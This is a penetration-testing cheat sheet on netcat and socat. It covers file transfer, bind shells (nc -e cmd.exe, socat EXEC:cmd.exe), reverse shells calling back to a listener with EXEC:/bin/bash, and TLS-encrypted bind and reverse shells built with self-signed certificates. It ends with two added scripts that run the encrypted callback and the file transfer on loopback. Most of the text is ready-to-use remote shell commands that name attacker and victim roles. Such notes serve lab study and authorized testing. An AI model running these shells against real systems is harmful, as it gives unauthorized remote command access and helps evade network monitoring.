Netcat / Socat

Netcat

Send a file from Kali to Windows

First on Windows (10.11.0.22):

nc -nlvp 4444 > incoming.exe

Then on Kali, push wget.exe (on Kali the Windows helper binaries live under /usr/share/windows-resources/binaries):

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

Neither end signals that the transfer is complete: once the sender's nc sits idle, Ctrl-C both sides and compare the file size (or a hash) with the original before running the binary.

Bind Shell on Windows

On Windows:

nc -nlvp 4444 -e cmd.exe

On Kali:

nc -nv 10.11.0.22 4444

The -e option exists in the nc.exe shipped with Kali and in netcat-traditional; the OpenBSD netcat installed on most Linux distributions drops it, so check nc -h before relying on it. The session is plaintext on the wire; the socat OPENSSL sections below wrap the same idea in TLS.

Socat

Simple connection

socat - TCP4:<target>:<target_port>

Bind

Bind a listener (a port below 1024 needs root, so prefix sudo on Kali):

socat TCP4-LISTEN:<local_port> STDOUT

File Transfer

Transfer a file from Kali (10.0.0.1) to Windows (10.0.0.2). On Kali, serve the file (fork hands each incoming connection to a child process, so the file can be fetched more than once; port 443 needs root):

socat TCP-LISTEN:443,fork file:file.txt

On Windows, retrieve the file (create makes socat create the local file if it does not exist yet):

socat TCP4:10.0.0.1:443 file:file.txt,create
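As an added example (not code from the page), the socat file transfer above, and the netcat version earlier on the page, run end to end against 127.0.0.1 with the check both of them lack: comparing a SHA-256 digest of the received copy with the source before using it. It assumes socat and sha256sum are installed, an unprivileged port 4443 (an assumption, chosen so no sudo is needed), and a constructed payload in place of wget.exe / file.txt. It fetches twice to show what fork buys you.

```shell
#!/bin/sh
# Added example (not from the original page): socat file transfer on the
# loopback interface with an integrity check, in the same form the page uses.
# Assumptions: socat and sha256sum are installed; port 4443 is arbitrary and
# unprivileged, so no sudo is needed (unlike 443); the payload is constructed.

PORT=4443

# Fetch from the listener on port $1 into file $2, retrying while the
# listener is still starting. -u makes the receiving socat read-only on the
# socket and write-only on the file, so nothing flows back to the sender.
fetch() {
    n=0
    until socat -u TCP4:127.0.0.1:"$1" FILE:"$2",create,trunc 2>/dev/null; do
        n=$((n + 1))
        [ "$n" -ge 10 ] && return 1
        sleep 1
    done
    return 0
}

# Serve a constructed file twice over socat and compare SHA-256 digests.
# Returns 0 when both copies match, 1 on failure, 77 if the tools are missing.
socat_file_transfer_demo() {
    command -v socat >/dev/null 2>&1 || return 77
    command -v sha256sum >/dev/null 2>&1 || return 77

    dir=$(mktemp -d) || return 1
    # Constructed payload standing in for wget.exe / file.txt, large enough
    # to need several socket reads.
    printf 'constructed payload header\n' > "$dir/src.bin"
    head -c 65536 /dev/urandom >> "$dir/src.bin"

    # Sender, as on the page: fork serves every client from a fresh child;
    # reuseaddr allows an immediate restart; rdonly stops anything the client
    # sends from being written into the file being served.
    socat TCP4-LISTEN:"$PORT",reuseaddr,fork FILE:"$dir/src.bin",rdonly &
    listener=$!

    # Receiver, twice: the forked listener keeps serving after the first client.
    rc=1
    if fetch "$PORT" "$dir/dst1.bin" && fetch "$PORT" "$dir/dst2.bin"; then
        want=$(sha256sum "$dir/src.bin" | cut -d' ' -f1)
        got1=$(sha256sum "$dir/dst1.bin" | cut -d' ' -f1)
        got2=$(sha256sum "$dir/dst2.bin" | cut -d' ' -f1)
        [ "$want" = "$got1" ] && [ "$want" = "$got2" ] && rc=0
    fi

    kill "$listener" 2>/dev/null || true
    wait "$listener" 2>/dev/null || true
    rm -rf "$dir"
    return "$rc"
}

# Stand-alone run: report the outcome rather than relying on the exit code.
rc=0
socat_file_transfer_demo || rc=$?
case "$rc" in
    0)  echo "transfer verified: both copies match the SHA-256 of the source" ;;
    77) echo "skipped: socat or sha256sum not installed" ;;
    *)  echo "transfer FAILED or digests differ" ;;
esac
```

On a real engagement the same check is a sha256sum on Kali and certutil -hashfile on Windows; a truncated transfer (typically from Ctrl-C too early) shows up as a digest mismatch rather than as a binary that crashes later.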

Reverse Shell

The listener (the machine that will receive the shell; 10.0.0.2 in the callback below) runs:

socat -d -d TCP4-LISTEN:443 STDOUT

-d -d prints connection notices, which is how you see the callback arrive. STDOUT works at an interactive terminal; if stdin is a pipe or a file, use STDIO (-) so socat reads from fd 0. Then the target, which hands out the shell, connects back with:

socat TCP4:10.0.0.2:443 EXEC:/bin/bash

The resulting bash has no pty, so job control, tab completion and programs that need a terminal will not work. For a full tty, run the listener as socat file:$(tty),raw,echo=0 TCP4-LISTEN:443 and the callback as socat TCP4:10.0.0.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane.

Encrypted Bind Shell

First use openssl to create a self-signed cert (the command prompts for the subject fields; answer them or pass -subj "/CN=anything" to skip the prompts):

  • -nodes = store the private key without a passphrase, so socat can load it unattended

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

This produces:

  • Private key: bind_shell.key

  • Certificate: bind_shell.crt

  • PEM file: bind_shell.pem

On the target (in a bind shell the target is the listener), start it:

  • fork: spawn a child process for each connection made to the listener, so the shell can be reconnected to after a dropped session

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

To connect to the listener (verify=0 skips checking the self-signed certificate: the channel is encrypted, but the client is not confirming whose listener it reached; if that matters, point cafile= at bind_shell.crt instead):

socat - OPENSSL:10.10.10.1:443,verify=0

Encrypted Reverse Shell

First create the SSL certificate, as for the bind shell, and bundle key and cert into one PEM:

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
cat shell.key shell.crt > shell.pem

Append DH parameters to the PEM (some socat builds cannot offer DHE cipher suites without them; generating 2048-bit parameters can take a minute or more):

openssl dhparam -out dhparams.pem 2048
cat dhparams.pem >> shell.pem

On the attacking machine, launch the socat listener:

socat -d -d OPENSSL-LISTEN:443,cert=shell.pem,verify=0 STDOUT

On the victim, call back with socat (the shell runs on the victim and connects out to the listener, which usually gets through egress filtering more easily than a bind shell):

socat OPENSSL:<listener>:443,verify=0 EXEC:/bin/bash
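As an added example (not code from the page), the encrypted reverse shell above, including the certificate steps it shares with the encrypted bind shell, run end to end on 127.0.0.1: a listener is started, a "victim" calls back with /bin/bash over TLS, one command is sent through the tunnel and its output is checked. It assumes openssl (1.1.1 or later, for -addext) and socat are installed; port 4443, the temporary directory and the CN/SAN of 127.0.0.1 are choices made for this example. Two things differ deliberately from the page's commands: the listener address is STDIO (-) because stdin is a pipe here, and the callback side pins the listener's own certificate with cafile= instead of verify=0.

```shell
#!/bin/sh
# Added example (not from the original page): the encrypted reverse shell
# run end to end on the loopback interface, reusing the page's openssl and
# socat invocations. Assumptions: openssl (1.1.1+ for -addext) and socat are
# installed; port 4443, the temp directory and the CN/SAN of 127.0.0.1 are
# choices made for this example.

PORT=4443

# Same key/cert/PEM steps as the page, made non-interactive with -subj and
# given a SAN for the listener address so the callback side can verify it.
make_cert() {   # $1 = directory to write shell.key, shell.crt, shell.pem into
    openssl req -newkey rsa:2048 -nodes -keyout "$1/shell.key" -x509 -days 365 \
        -subj "/CN=127.0.0.1" -addext "subjectAltName=IP:127.0.0.1" \
        -out "$1/shell.crt" 2>/dev/null || return 1
    cat "$1/shell.key" "$1/shell.crt" > "$1/shell.pem"
}

# Start the listener, have a "victim" call back with /bin/bash over TLS, send
# one command through the tunnel and check that its output came back.
# Returns 0 on success, 1 on failure, 77 if openssl or socat is missing.
encrypted_reverse_shell_demo() {
    command -v socat >/dev/null 2>&1 || return 77
    command -v openssl >/dev/null 2>&1 || return 77
    dir=$(mktemp -d) || return 1
    make_cert "$dir" || { rm -rf "$dir"; return 1; }

    # Listener (attacker side). Stdin is a pipe, not a terminal, so the address
    # is STDIO (-) rather than the page's STDOUT. The command string is
    # single-quoted: $(id -u) expands in the remote shell, not here. sleep keeps
    # stdin open for the reply; -t 2 keeps socat alive briefly after the peer
    # hangs up so the last output is written out.
    { printf 'echo CALLBACK_OK_$(id -u)\nexit\n'; sleep 3; } |
        socat -t 2 OPENSSL-LISTEN:"$PORT",reuseaddr,cert="$dir/shell.pem",verify=0 - \
        > "$dir/out.txt" 2>/dev/null &
    listener=$!

    # Victim side. Instead of verify=0, pin the listener's own certificate with
    # cafile so a different TLS endpoint on that port is refused; the retries
    # cover the moment before the listener has bound its port.
    n=0
    until socat OPENSSL:127.0.0.1:"$PORT",cafile="$dir/shell.crt",verify=1 \
            EXEC:/bin/bash 2>/dev/null; do
        n=$((n + 1))
        [ "$n" -ge 10 ] && break
        sleep 1
    done

    wait "$listener" 2>/dev/null || true
    rc=1
    grep -q "^CALLBACK_OK_$(id -u)\$" "$dir/out.txt" && rc=0
    rm -rf "$dir"
    return "$rc"
}

# Stand-alone run: report the outcome rather than relying on the exit code.
rc=0
encrypted_reverse_shell_demo || rc=$?
case "$rc" in
    0)  echo "encrypted callback worked: command output returned through TLS" ;;
    77) echo "skipped: openssl or socat not installed" ;;
    *)  echo "encrypted callback FAILED" ;;
esac
```

The page's dhparam step is left out because current socat and OpenSSL builds negotiate ECDHE without it; keep it for older builds that refuse to start without DH parameters. The pinning on the callback side costs nothing when you control both ends and means a stray listener on the same port cannot receive the shell.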

Bind shell for Windows

To create a bind listener on Windows (pipes makes socat talk to cmd.exe through a pair of unnamed pipes instead of a socketpair, which is the form that works with cmd.exe):

socat TCP4-LISTEN:443 EXEC:cmd.exe,pipes

You can use either nc or socat to connect:

nc -nv <windows_ip> 443
socat - TCP4:<windows_ip>:443
